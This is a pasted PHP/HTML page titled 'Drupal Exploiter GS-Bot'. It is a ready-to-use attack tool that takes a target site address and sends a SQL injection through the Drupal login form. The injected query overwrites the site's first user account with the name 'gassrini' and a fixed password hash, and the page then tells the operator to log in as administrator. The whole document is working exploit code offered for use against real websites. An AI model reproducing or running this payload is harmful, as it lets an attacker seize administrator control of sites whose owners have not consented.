SHOW:
|
|
- or go back to the newest paste.
1 | <!Doctype HTML> | |
2 | <html> | |
3 | <head> | |
4 | <title>Drupal Exploiter GS-Bot |CODED FALLAGASSRINI</title> | |
5 | <style type="text/css"> | |
6 | .mymargin{ | |
7 | margin-top:100px; | |
8 | color:white; | |
9 | font-family: monospace; | |
10 | } | |
11 | body{ | |
12 | background-color:black; | |
13 | } | |
14 | </style> | |
15 | </head> | |
16 | <body> | |
17 | <div class="mymargin"> | |
18 | <center> | |
19 | <form method="GET" action=""> | |
20 | Site : <input type="text" name="url" placeholder="Example: www.site.com"> | |
21 | <input type="submit" name="submit" value="submit"> | |
22 | </form> | |
23 | <br> | |
24 | <?php | |
25 | error_reporting(0); | |
26 | if(isset($_GET['submit'])){ | |
27 | ||
28 | $url = $_GET['url']; | |
29 | $post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status | |
30 | %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; | |
31 | $params = array( | |
32 | 'http' => array( | |
33 | 'method' => 'POST', | |
34 | 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
35 | 'content' => $post_data | |
36 | ) | |
37 | ); | |
38 | $ctx = stream_context_create($params); | |
39 | $data = file_get_contents($url . '/user/login/', null, $ctx); | |
40 | echo "<h3>Testing at \"/user/login/</h3>\""; | |
41 | if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) { | |
42 | echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login"; | |
43 | } else { | |
44 | echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
45 | } | |
46 | } | |
47 | ||
48 | if(isset($_GET['submit'])){ | |
49 | ||
50 | $url = "http://".$_GET['url']."/"; | |
51 | $post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status | |
52 | %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; | |
53 | $params = array( | |
54 | 'http' => array( | |
55 | 'method' => 'POST', | |
56 | 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
57 | 'content' => $post_data | |
58 | ) | |
59 | ); | |
60 | $ctx = stream_context_create($params); | |
61 | $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); | |
62 | echo "<h3>Testing at \"Index</h3>\""; | |
63 | if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { | |
64 | echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login"; | |
65 | } else { | |
66 | echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
67 | } | |
68 | } | |
69 | ||
70 | ?> | |
71 | </div> | |
72 | ||
73 | </body> | |
74 | </html> |